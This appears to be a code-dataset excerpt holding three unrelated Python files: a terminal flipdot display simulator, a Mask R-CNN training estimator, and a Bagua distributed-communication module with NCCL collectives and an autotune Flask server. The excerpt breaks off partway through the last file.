source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
sim.py
|
#! /usr/bin/env python
#
# python flipdot display simulator
import curses
import threading
import time
from PIL import Image
from flipdot import display
from flipdot.handler import *
class DisplaySim(threading.Thread):
def __init__(self, w, h, stdscr, refresh_rate=0.06, panels=None, portrait=False, debug=False):
super(DisplaySim, self).__init__()
self.d = display.Display(w, h, panels)
self.l = threading.RLock()
self.frames = 0
self.stopper = threading.Event()
self.portrait = portrait
self.stdscr = stdscr
self.debug = debug
self.sim_refresh = refresh_rate
self.debug_pos = (w+3, 1) if self.portrait else (h+3, 1) # position of debug data in ncurses
def stop(self):
self.stopper.set()
self.join()
def run(self):
while not self.stopper.is_set():
self.frames += 1
with self.l:
self.draw()
time.sleep(self.sim_refresh)
def draw(self):
if self.portrait:
px = self.d.im.rotate(angle=-90, expand=True).load()
h, w = self.d.im.size
else:
px = self.d.im.load()
w, h = self.d.im.size
if px:
# length of - to print for horizontal frame
r = w*2+2
onoff = {1: "●", 0: "○"}
self.stdscr.addstr(0, 1, "-"*r, curses.color_pair(2))
self.stdscr.addstr(h+1, 1, "-"*r, curses.color_pair(2))
for y in range(h):
self.stdscr.addstr(y+1, 0, "|", curses.color_pair(2))
self.stdscr.addstr(y+1, r+1, "|", curses.color_pair(2))
for x in range(w):
v = self.d.px_to_bit(px[x, y])
self.stdscr.addstr(y+1, 2+x*2, onoff[v], curses.color_pair(1))
self.stdscr.refresh()
def refresh_rate(self, address=None):
with self.l:
self.d.reset(address)
def update(self, data):
address = data[2]
body = data[3:-1]
if self.debug:
debug = "ADR: {} body: {}".format(address, ' '.join('{:02X}'.format(x) for x in body))
with self.l:
self.stdscr.addstr(self.debug_pos[0]+address, self.debug_pos[1], debug, curses.color_pair(3))
# update the internal image from the given list of bytes
if address in self.d.panels.keys():
(xs, ys), (w, h) = self.d.panels[address]
n = Image.new("RGB", (w, h))
if h != 7:
print("H is not 7!!!")
for x in range(w):
# get the next byte
b = body[x]
for y in range(h): # note that h should always be 7
px = b & 0x01
b = b >> 1
if px:
n.putpixel((x, y), (255, 255, 255))
with self.l:
self.d.im.paste(n, box=(xs, ys))
def start_server(args, sim):
if args.protocol != 'usb':
if args.protocol == 'tcp':
server = ThreadedTCPServer(("localhost", args.port), TCPHandler(sim.update))
elif args.protocol == 'udp':
server = ThreadedUDPServer(("localhost", args.port), UDPHandler(sim.update))
else:
raise ValueError('Invalid protocol')
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
else:
server = SerialHandler(args.usb, sim.update)
server.open()
def init_curses(args):
stdscr = curses.initscr()
curses.start_color()
# dots
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
# frame
curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.curs_set(0)
curses.noecho()
# make sure term is right size
if not args.debug:
if args.portrait:
curses.resize_term(args.width*2+4, args.height*2+4)
else:
curses.resize_term(args.height*2+4, args.width*2+4)
return stdscr
def stop_curses():
curses.echo()
curses.endwin()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Run a tui Alfa-Zeta flot-dot simulation')
parser.add_argument('-P','--protocol', type=str, choices=['tcp', 'udp', 'usb'],
default='udp',
help='communication protocol to use')
parser.add_argument('-r','--refresh', type=float, default=0.06,
help='panel refresh rate in seconds')
parser.add_argument('-p','--port', type=int, default=5000,
help='network port to use on localhost')
parser.add_argument('-u','--usb', type=str, default='/dev/ttyUSB0',
help='usb port of USB->RS485 device')
parser.add_argument('-x','--width', type=int, default=28,
help='display width, should be multiple of panel width 28')
parser.add_argument('-y','--height', type=int, default=14,
help='display height, should be multiple of panel height 7')
parser.add_argument('--portrait', action='store_true',
help='panels are in portrait orientation so rotate tui for display')
parser.add_argument('-d','--debug', action='store_true',
help='enabling debugging output')
args = parser.parse_args()
try:
stdscr = init_curses(args)
sim = DisplaySim(args.width, args.height, stdscr, debug=args.debug, refresh_rate=args.refresh, panels=display.create_display((28, 7), (args.width, args.height)), portrait=args.portrait)
if args.debug:
stdscr.addstr(*sim.debug_pos,
"W: {} H: {} Portrait: {} Panels: {} Panel size: {} Port: {}".format(args.width, args.height, args.portrait,
len(sim.d.panels), sim.d.panels[1][1], args.port),
curses.color_pair(2))
stdscr.addstr(sim.debug_pos[0]+1, sim.debug_pos[1], "Waiting for first data packet...", curses.color_pair(3))
sim.start()
start_server(args, sim)
try:
while True:
time.sleep(0.01)
except KeyboardInterrupt:
print("KeyboardInterrupt: stopping sim")
pass
sim.stop()
finally:
stop_curses()
|
mask_rcnn.py
|
"""Mask RCNN Estimator."""
# pylint: disable=consider-using-enumerate,abstract-method
import os
import math
import time
import logging
from multiprocessing import Process
import numpy as np
import mxnet as mx
from mxnet import gluon
from mxnet.contrib import amp
from .... import data as gdata
from .... import utils as gutils
from ....data import COCODetection, VOCDetection
from ....data.transforms import presets
from ....data.transforms.presets.rcnn import MaskRCNNDefaultTrainTransform, MaskRCNNDefaultValTransform
from ....model_zoo import get_model
from ....model_zoo.rcnn.mask_rcnn.data_parallel import ForwardBackwardTask
from ....nn.bbox import BBoxClipToImage
from ....utils.parallel import Parallel
from ....utils.metrics.rcnn import RPNAccMetric, RPNL1LossMetric, RCNNAccMetric, RCNNL1LossMetric, \
MaskAccMetric, MaskFGAccMetric
from ..base_estimator import BaseEstimator, set_default
from .utils import _get_dataset, _get_dataloader, _save_params, _split_and_load, _get_lr_at_iter
try:
import horovod.mxnet as hvd
except ImportError:
hvd = None
try:
from mpi4py import MPI
except ImportError:
logging.info('mpi4py is not installed. Use "pip install --no-cache mpi4py" to install')
MPI = None
from .default import MaskRCNNCfg
__all__ = ['MaskRCNNEstimator']
@set_default(MaskRCNNCfg())
class MaskRCNNEstimator(BaseEstimator):
"""Estimator implementation for Mask-RCNN.
Parameters
----------
config : dict
Config in nested dict.
logger : logging.Logger, default is None
Optional logger for this estimator, can be `None` when default setting is used.
reporter : callable, default is None
If set, use reporter callback to report the metrics of the current estimator.
Attributes
----------
_logger : logging.Logger
The customized/default logger for this estimator.
_logdir : str
The temporary dir for logs.
_cfg : autocfg.dataclass
The configurations.
"""
def __init__(self, config, logger=None, reporter=None):
super(MaskRCNNEstimator, self).__init__(config, logger, reporter)
# fix seed for mxnet, numpy and python builtin random generator.
gutils.random.seed(self._cfg.train.seed)
if self._cfg.mask_rcnn.amp:
amp.init()
# training contexts
if self._cfg.horovod:
self.ctx = [mx.gpu(hvd.local_rank())]
else:
ctx = [mx.gpu(int(i)) for i in self._cfg.gpus]
self.ctx = ctx if ctx else [mx.cpu()]
# network
kwargs = {}
module_list = []
if self._cfg.mask_rcnn.use_fpn:
module_list.append('fpn')
if self._cfg.mask_rcnn.norm_layer is not None:
module_list.append(self._cfg.mask_rcnn.norm_layer)
if self._cfg.mask_rcnn.norm_layer == 'bn':
kwargs['num_devices'] = len(self.ctx)
self.num_gpus = hvd.size() if self._cfg.horovod else len(self.ctx)
net_name = '_'.join(('mask_rcnn', *module_list, self._cfg.mask_rcnn.backbone, self._cfg.dataset))
if self._cfg.mask_rcnn.custom_model:
self._cfg.mask_rcnn.use_fpn = True
net_name = '_'.join(('mask_rcnn_fpn', self._cfg.mask_rcnn.backbone, self._cfg.dataset))
if self._cfg.mask_rcnn.norm_layer == 'bn':
norm_layer = gluon.contrib.nn.SyncBatchNorm
norm_kwargs = {'num_devices': len(self.ctx)}
# sym_norm_layer = mx.sym.contrib.SyncBatchNorm
sym_norm_kwargs = {'ndev': len(self.ctx)}
elif self._cfg.mask_rcnn.norm_layer == 'gn':
norm_layer = gluon.nn.GroupNorm
norm_kwargs = {'groups': 8}
# sym_norm_layer = mx.sym.GroupNorm
sym_norm_kwargs = {'groups': 8}
else:
norm_layer = gluon.nn.BatchNorm
norm_kwargs = None
# sym_norm_layer = None
sym_norm_kwargs = None
if self._cfg.dataset == 'coco':
classes = COCODetection.CLASSES
else:
# default to VOC
classes = VOCDetection.CLASSES
self.net = get_model('custom_mask_rcnn_fpn', classes=classes, transfer=None,
dataset=self._cfg.dataset, pretrained_base=self._cfg.train.pretrained_base,
base_network_name=self._cfg.mask_rcnn.backbone, norm_layer=norm_layer,
norm_kwargs=norm_kwargs, sym_norm_kwargs=sym_norm_kwargs,
num_fpn_filters=self._cfg.mask_rcnn.num_fpn_filters,
num_box_head_conv=self._cfg.mask_rcnn.num_box_head_conv,
num_box_head_conv_filters=self._cfg.mask_rcnn.num_box_head_conv_filters,
num_box_head_dense_filters=self._cfg.mask_rcnn.num_box_head_dense_filters,
short=self._cfg.mask_rcnn.image_short, max_size=self._cfg.mask_rcnn.image_max_size,
min_stage=2, max_stage=6, nms_thresh=self._cfg.mask_rcnn.nms_thresh,
nms_topk=self._cfg.mask_rcnn.nms_topk, post_nms=self._cfg.mask_rcnn.post_nms,
roi_mode=self._cfg.mask_rcnn.roi_mode, roi_size=self._cfg.mask_rcnn.roi_size,
strides=self._cfg.mask_rcnn.strides, clip=self._cfg.mask_rcnn.clip,
rpn_channel=self._cfg.mask_rcnn.rpn_channel,
base_size=self._cfg.mask_rcnn.anchor_base_size,
scales=self._cfg.mask_rcnn.anchor_scales,
ratios=self._cfg.mask_rcnn.anchor_aspect_ratio,
alloc_size=self._cfg.mask_rcnn.anchor_alloc_size,
rpn_nms_thresh=self._cfg.mask_rcnn.rpn_nms_thresh,
rpn_train_pre_nms=self._cfg.train.rpn_train_pre_nms,
rpn_train_post_nms=self._cfg.train.rpn_train_post_nms,
rpn_test_pre_nms=self._cfg.valid.rpn_test_pre_nms,
rpn_test_post_nms=self._cfg.valid.rpn_test_post_nms,
rpn_min_size=self._cfg.train.rpn_min_size,
per_device_batch_size=self._cfg.train.batch_size // self.num_gpus,
num_sample=self._cfg.train.rcnn_num_samples,
pos_iou_thresh=self._cfg.train.rcnn_pos_iou_thresh,
pos_ratio=self._cfg.train.rcnn_pos_ratio,
max_num_gt=self._cfg.mask_rcnn.max_num_gt,
target_roi_scale=self._cfg.mask_rcnn.target_roi_scale,
num_fcn_convs=self._cfg.mask_rcnn.num_mask_head_convs)
else:
self.net = get_model(net_name, pretrained_base=True,
per_device_batch_size=self._cfg.train.batch_size // self.num_gpus, **kwargs)
self._cfg.save_prefix += net_name
if self._cfg.resume.strip():
self.net.load_parameters(self._cfg.resume.strip())
else:
for param in self.net.collect_params().values():
if param._data is not None:
continue
param.initialize()
self.net.collect_params().reset_ctx(self.ctx)
if self._cfg.mask_rcnn.amp:
# Cast both weights and gradients to 'float16'
self.net.cast('float16')
# This layers doesn't support type 'float16'
self.net.collect_params('.*batchnorm.*').setattr('dtype', 'float32')
self.net.collect_params('.*normalizedperclassboxcenterencoder.*').setattr('dtype', 'float32')
# set up logger
logging.basicConfig()
self._logger = logging.getLogger()
self._logger.setLevel(logging.INFO)
log_file_path = self._cfg.save_prefix + '_train.log'
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(log_file_path)
self._logger.addHandler(fh)
if MPI is None and self._cfg.horovod:
self._logger.warning('mpi4py is not installed, validation result may be incorrect.')
self._logger.info(self._cfg)
self.rpn_cls_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)
self.rpn_box_loss = mx.gluon.loss.HuberLoss(rho=self._cfg.train.rpn_smoothl1_rho) # == smoothl1
self.rcnn_cls_loss = mx.gluon.loss.SoftmaxCrossEntropyLoss()
self.rcnn_box_loss = mx.gluon.loss.HuberLoss(rho=self._cfg.train.rcnn_smoothl1_rho) # == smoothl1
self.rcnn_mask_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)
self.metrics = [mx.metric.Loss('RPN_Conf'),
mx.metric.Loss('RPN_SmoothL1'),
mx.metric.Loss('RCNN_CrossEntropy'),
mx.metric.Loss('RCNN_SmoothL1'),
mx.metric.Loss('RCNN_Mask')]
self.rpn_acc_metric = RPNAccMetric()
self.rpn_bbox_metric = RPNL1LossMetric()
self.rcnn_acc_metric = RCNNAccMetric()
self.rcnn_bbox_metric = RCNNL1LossMetric()
self.rcnn_mask_metric = MaskAccMetric()
self.rcnn_fgmask_metric = MaskFGAccMetric()
self.metrics2 = [self.rpn_acc_metric, self.rpn_bbox_metric,
self.rcnn_acc_metric, self.rcnn_bbox_metric,
self.rcnn_mask_metric, self.rcnn_fgmask_metric]
self.async_eval_processes = []
self.best_map = [0]
self.epoch = 0
# training data
self.train_dataset, self.val_dataset, self.eval_metric = _get_dataset(self._cfg.dataset, self._cfg)
self.batch_size = self._cfg.train.batch_size // self.num_gpus \
if self._cfg.horovod else self._cfg.train.batch_size
self._train_data, self._val_data = _get_dataloader(
self.net, self.train_dataset, self.val_dataset, MaskRCNNDefaultTrainTransform, MaskRCNNDefaultValTransform,
self.batch_size, len(self.ctx), self._cfg)
def _validate(self, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map):
"""Test on validation dataset."""
clipper = BBoxClipToImage()
eval_metric.reset()
if not self._cfg.disable_hybridization:
self.net.hybridize(static_alloc=self._cfg.mask_rcnn.static_alloc)
tic = time.time()
for _, batch in enumerate(val_data):
batch = _split_and_load(batch, ctx_list=ctx)
det_bboxes = []
det_ids = []
det_scores = []
det_masks = []
det_infos = []
for x, im_info in zip(*batch):
# get prediction results
ids, scores, bboxes, masks = self.net(x)
det_bboxes.append(clipper(bboxes, x))
det_ids.append(ids)
det_scores.append(scores)
det_masks.append(masks)
det_infos.append(im_info)
# update metric
for det_bbox, det_id, det_score, det_mask, det_info in zip(det_bboxes, det_ids, det_scores,
det_masks, det_infos):
for i in range(det_info.shape[0]):
# numpy everything
det_bbox = det_bbox[i].asnumpy()
det_id = det_id[i].asnumpy()
det_score = det_score[i].asnumpy()
det_mask = det_mask[i].asnumpy()
det_info = det_info[i].asnumpy()
# filter by conf threshold
im_height, im_width, im_scale = det_info
valid = np.where(((det_id >= 0) & (det_score >= 0.001)))[0]
det_id = det_id[valid]
det_score = det_score[valid]
det_bbox = det_bbox[valid] / im_scale
det_mask = det_mask[valid]
# fill full mask
im_height, im_width = int(round(im_height / im_scale)), int(
round(im_width / im_scale))
full_masks = gdata.transforms.mask.fill(det_mask, det_bbox, (im_width, im_height))
eval_metric.update(det_bbox, det_id, det_score, full_masks)
if self._cfg.horovod and MPI is not None:
comm = MPI.COMM_WORLD
res = comm.gather(eval_metric.get_result_buffer(), root=0)
if hvd.rank() == 0:
logger.info('[Epoch {}] Validation Inference cost: {:.3f}'
.format(epoch, (time.time() - tic)))
rank0_res = eval_metric.get_result_buffer()
if len(rank0_res) == 2:
res = res[1:]
rank0_res[0].extend([item for res_tuple in res for item in res_tuple[0]])
rank0_res[1].extend([item for res_tuple in res for item in res_tuple[1]])
else:
rank0_res.extend([item for r in res for item in r])
def coco_eval_save_task(eval_metric, logger):
map_name, mean_ap = eval_metric.get()
if map_name and mean_ap is not None:
val_msg = '\n'.join(['{}={}'.format(k, v) for k, v in zip(map_name, mean_ap)])
logger.info('[Epoch {}] Validation: \n{}'.format(epoch, val_msg))
current_map = float(mean_ap[-1])
_save_params(self.net, logger, best_map, current_map, epoch, self._cfg.save_interval,
os.path.join(self._logdir, self._cfg.save_prefix))
if not self._cfg.horovod or hvd.rank() == 0:
p = Process(target=coco_eval_save_task, args=(eval_metric, self._logger))
async_eval_processes.append(p)
p.start()
def _fit(self, train_data, val_data, time_limit=math.inf):
"""
Fit Mask R-CNN models.
"""
# TODO(zhreshold): remove 'dataset' in config, use train_data/val_data instead
self._cfg.kv_store = 'device' \
if (self._cfg.mask_rcnn.amp and 'nccl' in self._cfg.kv_store) else self._cfg.kv_store
kv = mx.kvstore.create(self._cfg.kv_store)
self.net.collect_params().setattr('grad_req', 'null')
self.net.collect_train_params().setattr('grad_req', 'write')
for k, v in self.net.collect_params('.*bias').items():
v.wd_mult = 0.0
optimizer_params = {'learning_rate': self._cfg.train.lr, 'wd': self._cfg.train.wd,
'momentum': self._cfg.train.momentum, }
if self._cfg.train.clip_gradient > 0.0:
optimizer_params['clip_gradient'] = self._cfg.train.clip_gradient
if self._cfg.mask_rcnn.amp:
optimizer_params['multi_precision'] = True
if self._cfg.horovod:
hvd.broadcast_parameters(self.net.collect_params(), root_rank=0)
trainer = hvd.DistributedTrainer(
self.net.collect_train_params(), # fix batchnorm, fix first stage, etc...
'sgd',
optimizer_params
)
else:
trainer = gluon.Trainer(
self.net.collect_train_params(), # fix batchnorm, fix first stage, etc...
'sgd',
optimizer_params,
update_on_kvstore=(False if self._cfg.mask_rcnn.amp else None),
kvstore=kv)
if self._cfg.mask_rcnn.amp:
amp.init_trainer(trainer)
# lr decay policy
lr_decay = float(self._cfg.train.lr_decay)
lr_steps = sorted([float(ls) for ls in self._cfg.train.lr_decay_epoch])
lr_warmup = float(self._cfg.train.lr_warmup) # avoid int division
if self._cfg.train.verbose:
self._logger.info('Trainable parameters:')
self._logger.info(self.net.collect_train_params().keys())
self._logger.info('Start training from [Epoch %d]', self._cfg.train.start_epoch)
base_lr = trainer.learning_rate
for epoch in range(self._cfg.train.start_epoch, self._cfg.train.epochs):
self.epoch = epoch
rcnn_task = ForwardBackwardTask(self.net, trainer, self.rpn_cls_loss, self.rpn_box_loss, self.rcnn_cls_loss,
self.rcnn_box_loss, self.rcnn_mask_loss,
amp_enabled=self._cfg.mask_rcnn.amp)
executor = Parallel(self._cfg.train.executor_threads, rcnn_task) if not self._cfg.horovod else None
if not self._cfg.disable_hybridization:
self.net.hybridize(static_alloc=self._cfg.mask_rcnn.static_alloc)
while lr_steps and epoch >= lr_steps[0]:
new_lr = trainer.learning_rate * lr_decay
lr_steps.pop(0)
trainer.set_learning_rate(new_lr)
self._logger.info("[Epoch %d] Set learning rate to %f", epoch, new_lr)
for metric in self.metrics:
metric.reset()
tic = time.time()
btic = time.time()
train_data_iter = iter(self._train_data)
next_data_batch = next(train_data_iter)
next_data_batch = _split_and_load(next_data_batch, ctx_list=self.ctx)
for i in range(len(self._train_data)):
batch = next_data_batch
if i + epoch * len(self._train_data) <= lr_warmup:
# adjust based on real percentage
new_lr = base_lr * _get_lr_at_iter((i + epoch * len(self._train_data)) / lr_warmup,
self._cfg.train.lr_warmup_factor)
if new_lr != trainer.learning_rate:
if i % self._cfg.train.log_interval == 0:
self._logger.info('[Epoch %d Iteration %d] Set learning rate to %f', epoch, i, new_lr)
trainer.set_learning_rate(new_lr)
metric_losses = [[] for _ in self.metrics]
add_losses = [[] for _ in self.metrics2]
if executor is not None:
for data in zip(*batch):
executor.put(data)
for _ in range(len(self.ctx)):
if executor is not None:
result = executor.get()
else:
result = rcnn_task.forward_backward(list(zip(*batch))[0])
if (not self._cfg.horovod) or hvd.rank() == 0:
for k in range(len(metric_losses)):
metric_losses[k].append(result[k])
for k in range(len(add_losses)):
add_losses[k].append(result[len(metric_losses) + k])
try:
# prefetch next batch
next_data_batch = next(train_data_iter)
next_data_batch = _split_and_load(next_data_batch, ctx_list=self.ctx)
except StopIteration:
pass
for metric, record in zip(self.metrics, metric_losses):
metric.update(0, record)
for metric, records in zip(self.metrics2, add_losses):
for pred in records:
metric.update(pred[0], pred[1])
trainer.step(self.batch_size)
if (not self._cfg.horovod or hvd.rank() == 0) and self._cfg.train.log_interval \
and not (i + 1) % self._cfg.train.log_interval:
msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in self.metrics + self.metrics2])
self._logger.info('[Epoch {}][Batch {}], Speed: {:.3f} samples/sec, {}'.format(
epoch, i,
self._cfg.train.log_interval * self._cfg.train.batch_size / (time.time() - btic), msg))
btic = time.time()
# validate and save params
if (not self._cfg.horovod) or hvd.rank() == 0:
msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in self.metrics])
self._logger.info('[Epoch {}] Training cost: {:.3f}, {}'.format(
epoch, (time.time() - tic), msg))
if not (epoch + 1) % self._cfg.valid.val_interval:
# consider reduce the frequency of validation to save time
self._validate(self._val_data, self.async_eval_processes, self.ctx, self.eval_metric,
self._logger, epoch, self.best_map)
elif (not self._cfg.horovod) or hvd.rank() == 0:
current_map = 0.
_save_params(self.net, self._logger, self.best_map, current_map, epoch, self._cfg.save_interval,
os.path.join(self._logdir, self._cfg.save_prefix))
if self._reporter:
self._reporter(epoch=epoch, map_reward=current_map)
for thread in self.async_eval_processes:
thread.join()
def _evaluate(self, val_data):
"""Evaluate the current model on dataset.
"""
# TODO(zhreshold): remove self._val_data, use passed in val_data at runtime
return self._validate(self._val_data, self.async_eval_processes, self.ctx, self.eval_metric,
self._logger, self.epoch, self.best_map)
def predict(self, x):
"""Predict an individual example.
Parameters
----------
x : file
An image.
"""
x, _ = presets.rcnn.transform_test(x, short=self.net.short, max_size=self.net.max_size)
x = x.as_in_context(self.ctx[0])
ids, scores, bboxes, masks = [xx[0].asnumpy() for xx in self.net(x)]
return ids, scores, bboxes, masks
|
communication.py
|
import logging
import multiprocessing
import bagua_core as B
from bagua.service import AutotuneService
from collections import defaultdict
from . import env
from .env import (
get_master_addr,
get_world_size,
get_rank,
get_local_rank,
get_local_size,
get_default_bucket_size,
get_bagua_service_port,
)
from .utils import flatten, unflatten, to_bagua_reduce_op
import torch
import torch.distributed as dist
import torch.distributed.distributed_c10d as c10d
from bagua.service.autotune_service import AutotuneClient
from functools import lru_cache
@lru_cache(maxsize=None)
def get_hyperparameters_service_client():
hyperparameters_service_client = AutotuneClient(
get_master_addr(), get_bagua_service_port()
)
return hyperparameters_service_client
@lru_cache(maxsize=None)
def get_backend(model_name: str):
backend = B.BaguaCommBackendPy(100, device_id=get_local_rank())
backend.device_id = get_local_rank()
backend.stream = torch.cuda.Stream(priority=-1)
backend.store = c10d._get_default_store()
backend.internode_communicator = init_bagua_inter_communicator(
model_name=model_name,
stream=backend.stream,
leader_rank=0,
store=backend.store,
device_id=backend.device_id,
)
backend.intranode_communicator = init_bagua_intra_communicator(
model_name=model_name,
stream=backend.stream,
store=backend.store,
device_id=backend.device_id,
)
backend.global_communicator = init_bagua_communicator(
model_name=model_name,
stream=backend.stream,
store=backend.store,
device_id=backend.device_id,
)
return backend
def run_flask_app():
from flask import Flask
autotune_service = AutotuneService(
world_size=get_world_size(),
autotune_level=env.get_autotune_level(),
max_samples=env.get_autotune_max_samples(),
sampling_confidence_time_s=env.get_autotune_sampling_confidence_time_s(),
warmup_time_s=env.get_autotune_warmup_time_s(),
is_output_autotune_log=env.get_is_output_autotune_log(),
default_bucket_size=get_default_bucket_size(),
)
app = Flask(__name__)
app = autotune_service.setup_app(app)
log = logging.getLogger("werkzeug")
log.setLevel(logging.ERROR)
app.run(
host="0.0.0.0",
port=get_bagua_service_port(),
debug=False,
)
_autotune_server = None
def start_autotune_server():
"""Start autotune server in background."""
global _autotune_server
_autotune_server = multiprocessing.Process(target=run_flask_app)
_autotune_server.daemon = True
_autotune_server.start()
def init_process_group():
"""Initializes the PyTorch builtin distributed process group, and this will
also initialize the distributed package, should be executed before all the
APIs of bagua.
Raises:
RepeatedInitializationError: If you run this function repeatedly
Examples::
>>> import bagua.torch_api as bagua
>>> bagua.init_process_group()
>>> model = torch.nn.Sequential(
... torch.nn.Linear(D_in, H),
... torch.nn.ReLU(),
... torch.nn.Linear(H, D_out),
... )
>>> optimizer = torch.optim.SGD(
... model.parameters(),
... lr=0.01,
... momentum=0.9
... )
>>> model, optimizer = bagua_init(model, optimizer)
"""
if not dist.is_initialized():
torch.distributed.init_process_group(
backend="nccl", init_method="env://"
) # fmt: off
if get_rank() == 0 and _autotune_server is None:
start_autotune_server()
def gen_nccl_unique_id(comm_type: str, root=0, store=None):
key = f"{comm_type}-{root}-unique_id"
if store is None:
store = c10d._get_default_store()
if get_rank() == root:
idstr = B.BaguaSingleCommunicatorPy.generate_nccl_unique_id_str()
store.set(key, idstr)
else:
idstr = store.get(key)
idstr = str(idstr, encoding="utf-8")
return idstr
def init_bagua_inter_communicator(
model_name: str, stream, leader_rank=0, store=None, device_id=None
):
if device_id is None:
device_id = get_local_rank()
nccl_unique_id = gen_nccl_unique_id(
f"bagua_inter_comm_{model_name}", root=leader_rank, store=store
)
if get_rank() % get_local_size() != leader_rank:
return None
comm = B.BaguaSingleCommunicatorPy(
rank=get_rank() // get_local_size(),
nranks=get_world_size() // get_local_size(),
device_id=device_id,
stream_ptr=stream.cuda_stream,
nccl_unique_id_str=nccl_unique_id,
)
comm.cuda_stream = stream
logging.debug(
"init bagua internode communicator ok, global rank: %s rank: %s",
dist.get_rank(),
comm.rank(),
)
return comm
def init_bagua_intra_communicator(model_name: str, stream, store=None, device_id=None):
if device_id is None:
device_id = get_local_rank()
nccl_unique_id = gen_nccl_unique_id(
f"bagua_intra_comm_{model_name}",
root=get_rank() // get_local_size() * get_local_size(),
store=store,
)
comm = B.BaguaSingleCommunicatorPy(
rank=get_rank() % get_local_size(),
nranks=get_local_size(),
device_id=device_id,
stream_ptr=stream.cuda_stream,
nccl_unique_id_str=nccl_unique_id,
)
comm.cuda_stream = stream
logging.debug(
"init bagua intranode communicator ok, global rank: %s rank: %s",
dist.get_rank(),
comm.rank(),
)
return comm
def init_bagua_communicator(model_name: str, stream, store=None, device_id=None):
if device_id is None:
device_id = get_local_rank()
nccl_unique_id = gen_nccl_unique_id(f"bagua_global_comm_{model_name}", store=store)
comm = B.BaguaSingleCommunicatorPy(
rank=get_rank(),
nranks=get_world_size(),
device_id=device_id,
stream_ptr=stream.cuda_stream,
nccl_unique_id_str=nccl_unique_id,
)
comm.cuda_stream = stream
logging.debug(
"init bagua global communicator ok, global rank: %s rank: %s",
dist.get_rank(),
comm.rank(),
)
return comm
def send(tensor, dst, comm: B.BaguaSingleCommunicatorPy = None):
r"""Sends a tensor to dst synchronously.
Args:
tensor (torch.Tensor): Data to be sent.
dst (int): Destination rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator
to work on. If None, the global bagua communicator will be used.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.send(tensor.to_bagua_tensor().bagua_backend_tensor(), dst)
torch.cuda.synchronize()
def recv(tensor, src, comm: B.BaguaSingleCommunicatorPy = None):
r"""Receives a tensor synchronously.
Args:
tensor (torch.Tensor): Tensor to fill with received data.
src (int): Source rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator
to work on. If None, the global bagua communicator will be used.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.recv(tensor.to_bagua_tensor().bagua_backend_tensor(), src)
torch.cuda.synchronize()
def broadcast_coalesced(tensors, src=0, comm: B.BaguaSingleCommunicatorPy = None):
for tensor in tensors:
assert tensor.device != torch.device(
"cpu"
), "input tensors must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
coalesced = flatten(tensors)
comm.broadcast(coalesced.to_bagua_tensor().bagua_backend_tensor(), src)
for buf, synced in zip(tensors, unflatten(coalesced, tensors)):
buf.copy_(synced)
# TODO: remove
torch.cuda.synchronize()
def broadcast(tensor, src=0, comm: B.BaguaSingleCommunicatorPy = None):
r"""Broadcasts the tensor to the whole communicator.
`tensor` must have the same number of elements in all processes
participating in the collective.
Args:
tensor (torch.Tensor): Data to be sent if `root` is the rank of
current process, and tensor to be used to save received data
otherwise.
src (int, optional): Source rank. Defaults to 0.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator
to work on. If None, the global bagua communicator will be used.
Defaults to None.
""" # noqa: W293
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.broadcast(tensor.to_bagua_tensor().bagua_backend_tensor(), src)
# TODO: remove
torch.cuda.synchronize()
def reduce(
send_tensor,
recv_tensor,
dst,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
r"""Reduces the tensor across all processes.
Only the process whit rank `dst` is going to receive the final result.
Args:
send_tensor (torch.Tensor): Input of the collective.
recv_tensor (torch.Tensor): Output of the collective, must have the same size of send_tensor.
dst (int): Destination rank.
op (optional): one of the values from `torch.distributed.ReduceOp`
enum. Specifies an operation used for element-wise reductions.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
""" # noqa: W293
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.reduce(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
dst,
to_bagua_reduce_op(op),
)
torch.cuda.synchronize()
def reduce_inplace(
tensor, dst, op=dist.ReduceOp.SUM, comm: B.BaguaSingleCommunicatorPy = None
):
r"""The inplace version of reduce."""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
